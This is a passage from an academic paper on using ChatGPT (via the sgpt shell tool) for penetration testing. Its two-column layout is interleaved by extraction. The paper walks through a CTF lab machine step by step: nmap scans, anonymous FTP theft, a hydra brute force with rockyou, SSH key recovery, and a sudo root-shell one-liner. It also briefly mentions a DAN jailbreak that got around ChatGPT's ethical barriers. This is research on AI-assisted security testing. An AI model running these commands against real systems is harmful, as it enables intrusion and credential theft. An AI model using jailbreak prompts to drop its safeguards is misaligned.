programmed ethical barriers to output implicitly immoral or nmap -sn 10.0.2.0/24
unethical responses.
Explanation: Similar to finding the local machine’s IP
4.2 Experimentation address, enumerating the network helps determine which
hosts are active on the target network and identify potential
From Reconnaissance to Exploitation. A summary of the targets for further assessment and exploitation. It determines
steps taken in the simulated pentesting engagement is listed network topology including IP ranges, subnets and assists in

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

2084 E. Hilario et al.

Fig. 1 ChatGPT replying as

DAN

understanding the network layout crucial for planning sub- sgpt --shell "login anonymously
sequent attack vectors. to ftp 10.0.2.15, list the
contents and download the file
Step 3 - Scan the remote machine. secrets\token.txt"

Terminal Output:
Objective: Discovers open services, ports, and the operating
system running on the identified target, assisting in pinpoint-
ing potential vulnerabilities for exploitation. ftp 10.0.2.15; anonymous; ls;
get secrets/token.txt
Terminal Input for GenAI:
Explanation: After successfully logging in to the FTP server
sgpt --shell "scan 10.0.2.15 on anonymously, directory traversal was performed which
all ports to find out OS, resulted to discovering the file named secrets/
vulnerabilities" token.txt and then eventually downloaded.

Terminal Output: Step 5 - Read token.txt.

Objective: Access and read the contents of a downloaded

nmap -A -p- 10.0.2.15
file, retrieve a token within it and further the objectives of
the penetration testing activity.
Explanation: Once the target has been identified, discovering
open services, ports and the OS running, their versions, can Terminal Input for GenAI:
help pinpoint potential entry points and vulnerabilities that
can be leveraged during the exploitation phase. sgpt --shell "what is inside
token.txt"
Step 4 - Anonymous FTP login.
Terminal Output:
Objective: Attempt to login anonymously to an FTP server
cat token.txt
to list and download specified files, testing for weak security
configurations.
Explanation: After the file token.txt was successfully
Terminal Input for GenAI: exfiltrated from the remote machine through the anonymous

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

Generative AI for pentesting: the good, the bad, the ugly 2085

FTP login, finding out its contents was the next step which Terminal Output:
then revealed the first token.
curl http://10.0.2.15/store/
Step 6 - HTML source code. track.txt

Objective: Inspect the source code of a webpage served by Explanation: Another URL identified during the nmap scan
an Apache server on the remote machine to gather additional revealed a third user, admin, which was also added to
information. users.txt.
Terminal Input for GenAI:
Step 9 - Domain identified: pumpkins.local.
sgpt --shell "show the source
code of http://10.0.2.15" Objective: Identify the domain and modify the hosts file to
ensure proper domain resolution to further facilitate interac-
Terminal Output: tion with the target network.
Terminal Input for GenAI:
curl http://10.0.2.15
sgpt --shell "add 10.0.2.15
Explanation: Another service running on the remote machine to hosts as pumpkins.local"
is an Apache webserver on port 80 that serves the Pumpkin
Festival webpage. sgpt was used to view its source code. Terminal Output:

Step 7 - Identified users: harry and jack. echo "10.0.2.15 pumpkins.

local" | sudo tee -a /etc/hosts
Objective: Uncover user identities by examining HTML
source code and accumulating data for possible further Explanation: From the same /store/track.txt file,
exploitation. the domain pumpkins.local was revealed which then
Terminal Input for GenAI: needed to be added to the hosts file in order for the browser
to access the WordPress site properly.
sgpt --shell "enter harry
and jack into users.txt" Step 10 - The second token.

Terminal Output: Objective: Retrieve another token by inspecting HTML

source code.
echo "harry" >> users.txt Terminal Input for GenAI:
&& echo "jack" >> users.txt
sgpt --shell "show the source
Explanation: Two users, harry and jack, were revealed code of http://pumpkins.local
by reading the HTML source code. These are then entered and then filter for the line
into a text file for later use. where Token appears"

Step 8 - "/store/track.txt" and a third user, admin. Terminal Output:

Objective: Discover other users and URLs by examining net- curl http://pumpkins.local |
work scan results, enhancing the attacker’s understanding of grep Token
the target system.
Terminal Input for GenAI: Explanation: Using the same technique in step 6, the HTML
source code of http://pumpkins.local was curled but this time
sgpt --shell "show the source filtering for the word Token.
code of http://10.0.2.15/store/
track.txt" Step 11 - Wordpress scan.

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

2086 E. Hilario et al.

Objective: Aid the exploitation phase by conducting a scan - The upload directory has listing enabled, which could
on a WordPress site to identify possible vulnerabilities. potentially allow attackers to view and download sen-
sitive files.
Terminal Input for GenAI:
To further investigate these potential vulnerabilities,
you could perform additional scans and tests using tools
sgpt --shell "scan wordpress such as Metasploit, Burp Suite, or OWASP ZAP. These
site http://pumpkins.local tools can help you identify and exploit specific vulner-
and output it in a file abilities in the WordPress installation, and can provide
called wpscan.txt" more detailed information about the security posture of
the target system.
Terminal Output:
Explanation: The contents of wpscan.txt was piped or
wpscan -url http://pumpkins forwarded to sgpt in chat mode which gave an output of its
local -o wpscan.txt analysis listing vulnerabilities that can be further exploited.

Step 13 - Wordpress scan for users.

Explanation: Knowing that the website is a Wordpress site,
sgpt is prompted to scan it and output the results into Objective: Discover WordPress users for possible exploita-
wpscan.txt. tion or unauthorised access.

Step 12 - Piping results into sgpt for analysis. Terminal Input for GenAI:

sgpt --shell "scan wordpress

Objective: Analyse the scanning results to identify potential
site http://pumpkins.local for users"
vulnerabilities for exploitation, leveraging the AI’s knowl-
edge base and capabilities.
Terminal Output:
Terminal Input for GenAI:
wpscan -url "http://pumpkins.local
--enumerate u
cat wpscan.txt | sgpt --chat
pentest "find possible
vulnerabilities in this wpscan" Explanation: A second wpscan is used to find Wordpress
users where admin (already previously identified) and morse
Terminal Output: were discovered and added to users.txt (not pictured).

Based on the output of the WPScan tool, there are sev- Step 14 - Gobuster scan with wordlist.
eral potential vulnerabilities that could be exploited in
the WordPress installation on the target machine. Here Objective: Perform a directory and file brute force enumer-
are some of the key findings: ation on the WordPress site using gobuster to discover
- The WordPress version identified (4.9.3) is insecure additional resources or endpoints.
and was released on 2018-02-05. This means that there
may be known vulnerabilities that could be exploited to Terminal Input for GenAI:
gain unauthorized access to the system or compromise
its security. sgpt --shell "gobuster scan
- The external WP-Cron seems to be enabled, which http://pumpkins.local for php,
could potentially be used to launch denial-of-service html,txt,jpg,gif,png,zip,tar,gz,
attacks against the WordPress site. gpg,pem using wordlist dirbuster
- The version of the "twentyseventeen" theme in use directory-list-2.3-medium but
is out of date (version 1.4), which could potentially do not display progress"
contain known vulnerabilities that could be exploited to
gain unauthorized access to the system or compromise Terminal Output:
its security.
- Registration is enabled, which could potentially allow gobuster dir -w /usr/share/dir
attackers to create new user accounts with elevated priv- buster/wordslists/directory-
ileges. list-2.3-medium.txt -u http://

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

Generative AI for pentesting: the good, the bad, the ugly 2087

pumpkins.local -x php,html, Objective: Decipher the coded message to yield a password

txt,jpg,gif,png,zip,tar,gz,gpg, for potential unauthorised access.
pem -q
Terminal Input for GenAI:

Explanation: To further enumerate the Wordpress site, a tool sgpt --chat pentesting "python
called gobuster in tandem with a wordlist containing a script to decode base62 hash
list of commonly used filenames was used for this scan. K82v0SuvV1En350M0uxiXVRTmBrQIJQN
78s" > b62dec.py"
Step 15 - license.txt and the third token.
Terminal Output:
Objective: Retrieve a token among the discovered files. Here is a Python script that decodes the base62 hash
Terminal Input for GenAI: "K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s"
using the steps I outlined in my previous response:
sgpt --shell "get content of
http://pumpkins.local/license. 1 #```
txt filter for Token" 2 base62_dict = {
3 '0': 0,
Terminal Output: 4 '1': 1,
5 '2': 2,
6 ...
curl http://pumpkins.local/lic
7 'X': 59,
ense.txt | grep Token
8 'Y': 60,
9 'Z': 61
Explanation: A file named license.txt was revealed in10 }
the gobuster scan which was found to contain another11
token. 12 base62_str =
13 "K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s"
Step 16 - Show the contents of readme.html.txt. 14 base10_num = 0
15 for i, char in enumerate(base62_str[::-1]):
16 base10_num += base62_dict[char] * (62 ** i)
Objective: Display the contents of a file for inspection and
17
verification.
18 ascii_str = ""
Terminal Input for GenAI: 19 while base10_num > 0:
20 ascii_str = chr(base10_num % 256)
sgpt --shell show the contents 21 + ascii_str
of readme.html.txt" 22 base10_num //= 256
23

24 print(ascii_str)
Terminal Output: 25 #```
26

<!DOCTYPE html> 27 # When you run this script,

<html> 28 # it will output the decoded string, which is
... 29 # "-- This content is removed for
<p>K82v0SuvV1En350M0uxiXVRTmBrQIJQN 30 # security purposes --".
78s</p>
...

Explanation: From the gobuster scan, a file named Explanation: sgpt was used to identify the cipher and then
readme.html.txt was also discovered. It was found to prompted to create a python script to decode which was
contain a coded message. revealed to be a password.

Step 17 - Decrypt the coded message. Step 18 - The fourth token.

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

2088 E. Hilario et al.

Upon logging in using the password, the fourth token was sgpt --shell "what filetype
immediately found under the Profile page (/wp-admin/ is data.txt"
profile.php).
Terminal Output:
Step 19 - Logging in to FTP using rockyou.
file data.txt

Objective: Use the rockyou password list, a list of over 14 Explanation: Two tokens were found by traversing the FTP
million plaintext passwords from a 2009 database leak, to folders and a mysterious third file named data.txt was
Terminal Input for GenAI: also exfiltrated.

Step 22 - Extracting the contents of data.txt.

sgpt --shell "crack the password
for service ftp on port 21 for
Objective: Unveil the contents of a POSIX tar archive.
user harry on server 10.0.0.15
Terminal Input for GenAI:
using rockyou password list"
sgpt --shell "extract posix
Terminal Output:
tar archive called data.txt
not data.txt.tar"
hydra -l harry -P /usr/share/
wordlists/rockyou.txt ftp:// Terminal Output:
10.0.2.15:21
tar -xf data.txt.tar
Explanation: With the four usernames discovered, sgpt was
queried to find out the password for any one of these users Explanation: data.txt was revealed to be a POSIX tar
using the rockyou password list. archive which required extraction.

Step 20 - Login to FTP using the found credentials. Step 23 - Inception extraction of data.

Objective: Utilise previously discovered credentials to log Objective: Conduct further extraction to discover data
into an FTP server to gain initial access or discover further embedded within the archive.
information about the target system. Terminal Input for GenAI:

Terminal Input for GenAI: sgpt --shell "rename data to

data.tar.bz2 and then extract
sgpt --shell "with user harry bzip2 compressed data named
ftp to pumpkins.local" data only"

Terminal Output: Terminal Output:

echo "ftp [email protected] mv data data.tar.bz2 && tar

-xvjr data.tar.bz2
Explanation: The previous step revealed harry’s username
and password which was then used to login via FTP to Explanation: The file data contained within data.txt
pumpkins.local. was found to be a bzip2 archive.

Step 21 - Fifth and sixth token plus a mystery file. Step 24 - Inside the key tar archive is jack.

Objective: Identify the file within the bzip2 archive.

Objective: Traverse the FTP folders, which could potentially
Terminal Input for GenAI:
contain valuable information or clues for the next steps of
the penetration testing process.
sgpt --shell "decode file
Terminal Input for GenAI: called jack full of hex values"

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

Generative AI for pentesting: the good, the bad, the ugly 2089

Terminal Output: Objective: Correct permissions on the OpenSSH private key

file to enable SSH login.
xxd -r -p jack Terminal Input for GenAI:

Explanation: A file within the archive named key was found sgpt --shell "under elevated
to be another POSIX tar archive which was then extracted. privilege, change permission
It revealed a file named jack which contained 10,106 lines of ˜/.ssh/id_rsa from read-only
of ASCII text that appeared to be hex values. to read and write for the owner"

Step 25 - OpenSSH private key location. Terminal Output:

Objective: Identify the appropriate directory of a file after

sudo chmod 600 ˜/.ssh/id_rsa
decoding the hex values within it.
Terminal Input for GenAI:
Explanation: Due to a permissions error on the id_rsa file, the
sgpt -chat pentest "where do server required correct permissions to be set on the file before
I put an openssh registry key allowing the SSH login through port 6880. This is a common
file" administrative task to ensure proper security measures are in
place to allow necessary permissions for authorised users.
Terminal Output:
Step 27 - Logging in to the SSH using the private key.
˜/.ssh/id_rsa
Objective: Use the private key to log into the SSH server to
Explanation: The first part of this step is querying ChatGPT grant access to a secure shell on the target system.
for the usual location of an OpenSSH private key file. Terminal Input for GenAI:
Terminal Input for GenAI:
sgpt --shell "login to 10.0.2.15
sgpt --shell "decode file called
port 6880 as the user jack
jack full of hex values and
using the id_rsa private key"
put it in a file called id_rsa"

Terminal Output: Terminal Output:

xxd -r jack > id_rsa ssh -i ˜/.ssh/id_rsa jack@

10.0.2.15 -p 6880
Explanation: The command from the previous step was
redone to automatically output the contents into an appro- Explanation: In this step, the command to login as jack is
priately named file called id_rsa. issued to the SSH server on port 6880 using the id_rsa file
Terminal Input for GenAI: but this time with correct permissions.

sgpt --shell "move id_rsa to Step 28 - List user’s privileges.

˜/.ssh/id_rsa"
Objective: List a user’s privileges to identify potential path-
Terminal Output: ways for privilege escalation.

mv id_rsa ˜/.ssh/id_rsa Terminal Input for GenAI:

Explanation: The final part of this step is to move the sgpt --chat pentest "after
OpenSSH private key file into its appropriate location. This logging into ssh as a standard
is a critical step for gaining authorised access to the target user, suggest pathways towards
system. privilege escalation"

Step 26 - Allocating correct permissions. Terminal Output:

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

2090 E. Hilario et al.

To escalate privileges after logging into ssh as a stan- Terminal Output:

dard user, you can try the following pathways:
1. Check if the user has sudo privileges by running the mkdir /home/jack/pumpkins &&
command "sudo -l". If the user has sudo privileges, echo '/bin/bash' > /home/jack/
you can try to execute commands with sudo to escalate pumpkins/alohomora && chmod +x
privileges. /home/jack/pumpkins/alohomora
2. Look for any misconfigured setuid binaries that can && sudo /home/jack/pumpkins/
be exploited to escalate privileges. You can use the com- alohomora
mand "find / -perm -4000 2>/dev/null" to find setuid
binaries.
Explanation: In true lackadaisical fashion belonging to a
3. Check if there are any vulnerable services running on
beginner pentester, sgpt was asked to craft the series of
the system that can be exploited to escalate privileges.
commands that it suggested previously into a "one-liner"
You can use tools like nmap or Metasploit to scan for
(code that occupies only one line, once considered to be the
vulnerabilities.
epitome of a great coder, now reduced to a basic prompt).
4. Look for any writable directories or files that can
This final step showcases AI’s capability to write such an
be exploited to escalate privileges. You can use the
exploit in a succinct manner.
command "find / -writable -type d 2>/dev/null" to find
Once the crafted exploit was executed, the active user then
writable directories.
became root and privilege escalation was attained.
Explanation: As a beginner pentester, the exploitation stage As for the final phase which is creating the Penetration
of pentesting is considered the most challenging. Having an Testing Report, cached chats, prompts and responses were
AI suggest ways to exploit a certain vulnerability makes the collated and used to produce the report in “Appendix A”.
activity quite effortless. The output above includes several
very accurate suggestions that a pentester would normally
take. 5 Results and discussions
Terminal Input for GenAI:
This section frames how ChatGPT was applied to the phases
sgpt -s "command to list user's of the pentesting process [36] and also discusses the potential
privileges" applications identified during the course of the experimenta-
tion.
Terminal Output: By correlating each step in Sect. 4.2 Experimentation with
the relevant subsections in this section, we can demonstrate
sudo -l how the steps in the genAI-assisted pentesting engagement
align with the different stages of penetration testing. This
Explanation: The first suggestion above is executed which helps in understanding how generative AI tools can assist in
checks if the user has privileges to sudo (meaning superuser each of the stages in the pentesting process.
do) to be able to find commands that can be executed with
escalated privileges. This is a crucial step in gaining higher-
5.1 Reconnaissance
level access and enable further exploitation of vulnerabilities
within the target system.
In the reconnaissance phase, or Open-Source Intelligence
(OSINT) gathering, ChatGPT can be used for gathering infor-
Step 29 - Crafting the exploit.
mation about the target system, network, or organisation for
the purpose of identifying potential vulnerabilities and attack
Objective: Craft an exploit based on the previously suggested
vectors. By leveraging its natural language processing and
pathways for privilege escalation.
data retrieval capabilities, ChatGPT can assist in perform-
Terminal Input for GenAI: ing both active and passive recon through sgpt. Without
sgpt, making note of the findings during this phase is vital
sgpt -s "create the directory to the later phases. Choosing to use either sgpt or Chat-
/home/jack/pumpkins, echo GPT’s web interface to conduct the entire pentesting process
'/bin/bash' into /home/jack/ has the added advantage of not needing to manually record
pumpkins/alohomora, then assign and keep track of the findings. The latter, however, has the
execute permission to it, then disadvantage of manual handling of input and output as was
execute file as the user root" already mentioned earlier.

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

Generative AI for pentesting: the good, the bad, the ugly 2091

By finding the local machine’s IP address in Step 1, initial ChatGPT highlighted the utility and depth of its knowledge-
connectivity information is established—a crucial part of the base and helped deliver a successful active reconnaissance
planning and reconnaissance stage of the pentesting process. phase.

Passive reconnaissance Concluding the reconnaissance phase

Although passive reconnaissance was not utilised during the While not applicable to the experimentation conducted
experimentation phase, in a real-world pentesting scenario, in Sect. 4.2 Experimentation, ChatGPT can be used to
ChatGPT can be used to gather publicly available information generate a detailed report of the initial findings from the
about the target. These applications include: reconnaissance phase, which can be used in the subsequent
phases of the penetration test. As seen in “Appendix A”, the
– Searching the web for information related to the tar- report include a summary of the target’s profile, identified
get organisation, such as its domain name, IP addresses, vulnerabilities, potential attack vectors, and recommenda-
employee names, and email addresses. tions for further investigation. This was not applicable to the
– Analysing social media profiles of key personnel within experimentation conducted, however.
the target organisation to identify potential security weak
points. 5.2 Scanning
– Reviewing public databases, like WHOIS records, to
extract valuable information about the target’s domain In the scanning phase, ChatGPT can be used to aid in
and IP addresses. performing detailed scans of the target particularly their
– Identifying the technologies used by the target, includ- network, systems and applications to identify open ports,
ing server and client-side software, by examining their services, and potential vulnerabilities. By leveraging its nat-
public-facing web applications or analysing job postings. ural language processing (NLP) capabilities and integration
with common or publicly available scanning tools, ChatGPT
In a paper discussing ChatGPT and reconnaissance [42], can assist in interpreting the scan output.
prompts were created to extract information from ChatGPT Scanning is best exhibited from Step 11 through to Step 14
−3.5 although the exact prompts and results were not made which started with a vulnerability scan being conducted on
available. the Wordpress site using wpscan as well as a gobuster
scan also performed using a medium wordlist to enumerate
Active reconnaissance directories and files. Step 2 and Step 3 is also applicable to
this phase of the process as the network is probed and open
Although directly using ChatGPT to interact with the target’s services and ports were discovered.
systems and networks to gather more detailed information is
not possible mainly due to its policies and also the resulting Define parameters
information may be outdated, it can however be used in the
following manner: At the start of the conversation, the necessary parameters
can be provided to ChatGPT in a variable-style format
– Crafting and sending custom DNS queries to identify which it can then "remember" or store in its memory for
subdomains, IP addresses, and mail servers associated the duration of the conversation. For example, the variable
with the target. [target] can be allocated with the target’s IP addresses,
– Using ChatGPT’s natural language processing capabil- [hostname] for the device’s NetBIOS name, or [FQDN]
ities to analyse responses from network services like for the fully qualified domain name of the target (see Fig. 2).
SMTP, FTP, and HTTP, and extract useful information These parameters can be based on the information gathered
about the target’s infrastructure. during the Reconnaissance phase.
– Instructing ChatGPT to generate network scans using
tools like Nmap, Nessus or OpenVAS to identify open 5.2.1 Execution
ports, services, and operating systems on the target’s net-
work. As demonstrated in Fig. 2, ChatGPT can then generate the
commands using the defined parameters to perform various
Step 6 to Step 9 demonstrate these capabilities. From inspec- scans such as:
tion of the webpage’s source code, uncovering the usernames,
discovering URLs and up to identifying the relevant domain, – Network scans with Nmap:

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

2092 E. Hilario et al.

Fig. 2 Sample prompt defining

parameters and the output code

– Instruct ChatGPT to generate a command perform a 5.2.2 Interpretation

comprehensive network scan
– If scanning multiple targets, provide the text file name Using ChatGPT’s natural language processing capabilities to
containing the list of target IPs instead. analyse the output of the scans, highlight relevant information
and identify potential vulnerabilities, it can:
– Vulnerability scans with Nessus or OpenVAS:
– Instruct ChatGPT to enumerate steps to create a new – Summarise the scan results, focusing on high-priority
scan in the vulnerability scanning tool, specifying the vulnerabilities and critical findings.
target’s IP addresses, domain names, or subdomains. – Correlate the scan data with information gathered during
– Configure the scan with appropriate settings, such the Reconnaissance phase to provide context and priori-
as scan intensity, authentication credentials (if pro- tise vulnerabilities.
vided), and specific vulnerability checks to run. – Offer suggestions for further investigation or potential
– Web application scans with Burp Suite or OWASP ZAP: remediation strategies.

– Instruct ChatGPT to help configure the web applica-

This capability was leveraged throughout the pentesting pro-
tion scanner with the target’s web application URL
cess where prompts were constructed in plain English and
and any necessary authentication credentials.
ChatGPT responded with technical responses.
– Instruct ChatGPT to list the steps to be able to run an
active or passive scan of the web application, depend-
ing on the scope and varying or desired scanning 5.2.3 Continuous monitoring
intensities.
Generate ChatGPT prompts for how to conduct continuous
monitoring of the target environment, and update findings as
changes occur in the target’s network, systems, and applica-
tions. This will help ensure the most up-to-date information
is available for the subsequent phases of the pentest.

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

Generative AI for pentesting: the good, the bad, the ugly 2093

5.3 Vulnerability assessment 5.5 Reporting

This phase of the pentesting process relies more on the 5.5.1 Automated report generation
analysis of the results from reconnaissance and scanning.
Creativity is almost a requirement in finding out the inherent The generation of the Penetration Testing Report in
vulnerabilities based on the combination of these results. In “Appendix A” relied on the key strength of LLMs—the ability
this regard, ChatGPT can be seen to provide guidance and to generate human-like text based on the input given. In this
recommendations on the use of certain tools and techniques. case, the prompts and responses and the entire body of results
Its competence in deduction and interpretation of the results as output from its suggested commands. It was able to sum-
are also useful. Due to this, it is able to prioritise the vulnera- marise concisely the steps to root the machine and presents
bilities by order of most significant risk or by easiest to crack. this in the Test Methodology and Detailed Findings sections
It is also able to digest an inordinate amount of text such as of the report. Its Recommendations were also accurate. Cou-
logs in a fraction of time compared to manual techniques or pled with other tools, such as visualisation software, it can
even using semi-automated tools to summarise the output. potentially generate other forms of data representation to be
included in the report and help make it more understandable
or actionable for the client.

5.4 Exploitation
5.5.2 Customisation and quality
While ChatGPT proved to be an excellent genAI tool for
The reporting format can vary widely for every target and for
pentesting for the previous phases, it shone the greatest in
every client. ChatGPT could be used to customise the report
exploiting the vulnerabilities of the remote machine. The
based on the specifications of the client, the nature and the
various steps that exploited the vulnerabilities discovered are
findings of the test. Quality-wise it can produce an accurate,
listed below:
complete and polished report based on ChatGPT’s ability to
check for errors, inconsistencies and identify areas that need
clarification.
Step 4 - anonymous FTP login
Step 5 - accessing the contents of token.txt
Step 15 - retrieval of a token from a discovered file 6 Conclusion
Step 17 - a coded message was deciphered to yield a
password GenAI and LLMs have the potential to revolutionise pentest-
Step 18 - logging in and retrieving another token ing, offering numerous benefits such as improved efficiency,
Step 19 - using the rockyou password list to crack the enhanced creativity, customised testing environments, and
FTP login continuous learning and adaptation. However, applications
Step 20 - utilising the discovered credentials to login to in this domain is double-edged presenting novel challenges
the FTP server and limitations, such as overreliance on AI, potential model
bias or fairness issues notwithstanding the ethical and legal
concerns,
Moreover, the use of GenAI in pentesting can lead to
Exploit selection. In Step 28 ChatGPT was able to identify potential risks and unintended consequences, including its
and suggest potential exploits that were most appropriate use in generating polymorphic malware, escalation of cyber
given the chat history and by doing so, takes full advantage threats, advanced persistent threats, and uncontrolled AI
of the earlier identified vulnerabilities. development.
Customised exploits. In the case of decoding a string into To address these concerns, organisations must adopt best
base 62 as shown in Step 17, the python script it created practices and guidelines, focusing on responsible AI deploy-
in a matter of seconds was simple yet completely effective. ment, data security and privacy, and fostering collaboration
That is all that matters. A tool that does the job. And almost and information sharing. Governments should strike a bal-
instantaneous at that. ance between limiting its negative applications while not
Step 29 represented the culmination of the exploitation hindering its potential.
phase as ChatGPT crafted the final exploit based on the pre- In conclusion, it does offer promising opportunities for
viously identified pathways ultimately resulting in privilege enhancing the effectiveness of pentesting and ultimately
escalation. improving the cyber security posture of organisations.

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

2094 E. Hilario et al.

While the experimentation was successful in completing intended use is not permitted by statutory regulation or exceeds the
its objective of fully compromising the remote machine, it permitted use, you will need to obtain permission directly from the copy-
right holder. To view a copy of this licence, visit http://creativecomm
is essential for stakeholders to carefully consider potential ons.org/licenses/by/4.0/.
challenges, risks, and unintended consequences associated
with its use.
The key is to adopt responsible practices to ensure that the
benefits of the technology are realised while minimising the Appendix A: Penetration testing report
potential downsides. By doing so, organisations can leverage
the power of GenAI to better protect themselves against the Appendix A.1: Executive summary
ever-evolving threat landscape and maintain a secure digital
environment for all. The penetration test was conducted on a virtual machine
called "PumpkinFestival". The objective of the test was to
identify vulnerabilities and exploit them to gain unauthorized
access to the system. The test was successful in achiev-
7 Future works ing its objective. The vulnerabilities identified and exploited
included an anonymous FTP login, a WordPress site with
Future works identified to have the potential to advance the
multiple users, and a misconfigured sudo rights for a user.
research and experiment conducted in this paper and the field
of GenAI and pentesting in general are briefly discussed in
this section. Appendix A.2: Test methodology
Auto-GPT [40] is an open-source and Python-based tool
that makes GPT-4 completely autonomous using subpro- 1. Initial Reconnaissance The initial scan was conducted
cesses of GPT-4 to break down and achieve the objective using Nmap, which revealed FTP on port 21 allowing
a user sets. It has the most potential in advancing research anonymous login. The first PumpkinToken was found on
in this field when theoretically, a singular prompt to "pen- the FTP server.
test a target machine" is all that is required. The project 2. HTTP and FTP Exploration The HTTP website was
was released only about two weeks after OpenAI’s GPT-4 explored, revealing another PumpkinToken hidden in the
release on 14th March 2023. It quickly became the top trend- source code. The /tokens/ and /users/ directories were
ing repository on GitHub shortly after. Although it currently forbidden, and the /wordpress/ directory returned a 404
suffers from issues such as "hallucinations", many users con- error. A note was found in /store/track.txt, hinting at
tinue to find uses for the project. a local domain (pumpkins.local) and an email address
In addressing concerns regarding privacy and confiden- ([email protected]).
tiality, integrating sgpt with privateGPT [20], a tool that 3. Domain Manipulation and WordPress Scanning The
uses GPT for private interaction with documents is one real- /etc/hosts file was edited to include the line "192.168.1.109
istic body of work identified. pumpkins.local", which allowed access to a WordPress
Funding Open Access funding enabled and organized by CAUL and
site when visiting pumpkins.local. Another PumpkinTo-
its Member Institutions ken was found on this site. A WordPress scan revealed two
users and several vulnerabilities, but all required authen-
Data Availibility We do not analyse or generate any data-sets, because tication or were not useful.
our work proceeds within a virtual machine environment. One can
obtain the relevant materials from the reference [21].
4. FTP Revisited and Bruteforce Attack A hint from the
author suggested revisiting the FTP. The name "Harry"
Declarations was found in the initial note, and a bruteforce attack using
Hydra revealed the password for the user "Harry". This
Conflict of interest The authors declare that there are no conflicts of led to another directory named "Donotopen", containing
interest. another PumpkinToken and a file named data.txt.
5. Binary File and Private Key Extraction The data.txt file
Open Access This article is licensed under a Creative Commons
Attribution 4.0 International License, which permits use, sharing, adap-
contained binary data, which turned out to be a tar file.
tation, distribution and reproduction in any medium or format, as This file contained a file named "jack", which was a hex-
long as you give appropriate credit to the original author(s) and the encoded private key for the user "Jack". This allowed SSH
source, provide a link to the Creative Commons licence, and indi- login into Jack’s account.
cate if changes were made. The images or other third party material
in this article are included in the article’s Creative Commons licence,
6. Further Enumeration and Token Extraction Running an
unless indicated otherwise in a credit line to the material. If material enumeration script revealed some user and SUIDs. Run-
is not included in the article’s Creative Commons licence and your ning the token SUID printed out another PumpkinToken.

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

Generative AI for pentesting: the good, the bad, the ugly 2095

7. HTTP Revisited and Directory Enumeration HTTP was The scan revealed two users, admin and morse. A
revisited with directory enumeration using Gobuster. A gobuster scan was also conducted to further enumer-
readme.html file was found containing a base62 encoded ate the WordPress site.
string, which decoded to a password for the users "morse" 5. SSH Exploitation A file named jack was identified to
and "jack". contain hex values, which were decoded to reveal an
8. WordPress Login and Privilege Escalation The password OpenSSH private key. The key was used to login to the
was used to log into the WordPress dashboard. Although SSH server on port 6880 as the user jack. The user’s
there was no theme editor, the password was used to privileges were listed using sudo -l.
check Jack’s sudo rights. Jack was able to run a non- 6. Privilege Escalation The user jack was found to have
existent file /home/jack/pumpkin/alohomora, sudo rights to run
which was created with a bash shell script. Running this
file as sudo gave root access. /home/jack/pumpkin/alohomora

Appendix A.3: Detailed findings Since this file did not exist, it was created with a shell
script and run with sudo to gain a root shell.
1. Network Scanning The local machine’s IP address was
identified using the command Appendix A.4: Recommendations

ip addr show | grep "inet " | The identified vulnerabilities should be addressed to improve
awk `{print $2}' | cut the security posture of the system. Specifically:
-d `/' -f1
1. Strengthen password policies to prevent brute force
The network was probed using the command attacks.
2. Disable anonymous FTP login to prevent unauthorised
nmap -sn 10.0.2.0/24 access to files.
3. Regularly update the WordPress site and its plugins to
and the remote machine was scanned using patch known vulnerabilities.
4. Implement proper input validation to prevent hidden
injection attacks.
nmap -A -p- 10.0.2.15
5. Restrict sudo rights to only necessary commands for each
user.
2. FTP Exploitation An FTP service running on the remote 6. Regularly review and update user privileges, and correct
machine allowed for anonymous login. The command file and directory permissions.

ftp 10.0.2.15; anonymous; ls; Appendix A.5: Conclusion

get secrets/token.txt
The penetration test was successful in identifying and
was used to login, list the contents, and download a exploiting vulnerabilities in the "PumpkinFestival" virtual
file named token.txt. The contents of the file were machine, with root access achieved and all PumpkinTokens
viewed using cat token.txt. collected. The test revealed several vulnerabilities in the
3. Web Server Exploitation The source code of the web- system, including weak passwords, hidden tokens, and mis-
page served by an Apache webserver on port 80 was configured permissions. The findings and recommendations
viewed using curl http://10.0.2.15. Two users, harry provided in this report should be used to enhance the system’s
and jack, were identified from the HTML source code. security.
Another user, admin, was identified from the URL
/store/track.txt. The domain pumpkins.local
was also identified and added to the hosts file. References
4. WordPress Exploitation The WordPress site was scanned
using 1. Abu-Dabaseh, F., Alshammari, E.: Automated penetration testing:
An overview. In: The 4th International Conference on Natural Lan-
guage Computing, Copenhagen, Denmark. pp. 121–129 (2018)
wpscan -url 2. Adamović, S.: Penetration testing and vulnerability assessment:
http://pumpkins.local -o wpscan.txt introduction, phases, tools and methods. In: Sinteza 2019-

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

2096 E. Hilario et al.

International Scientific Conference On Information Technology 19. Hern, A., Milmo, D.: AI chatbots making it harder to spot
and Data Related Research. pp. 229–234 (2019) phishing emails, say experts. The Guardian. (2023) https://www.
3. Aggarwal, G.: Harnessing GenAI: Building Cyber Resilience theguardian.com/technology/2023/mar/29/ai-chatbots-making-
Against Offensive AI. Forbes. (2023) https://www.forbes.com/ it-harder-to-spot-phishing-emails-say-experts
sites/forbestechcouncil/2023/09/25/harnessing-genai-building- 20. Imartinez privateGPT. https://github.com/imartinez/privateGPT
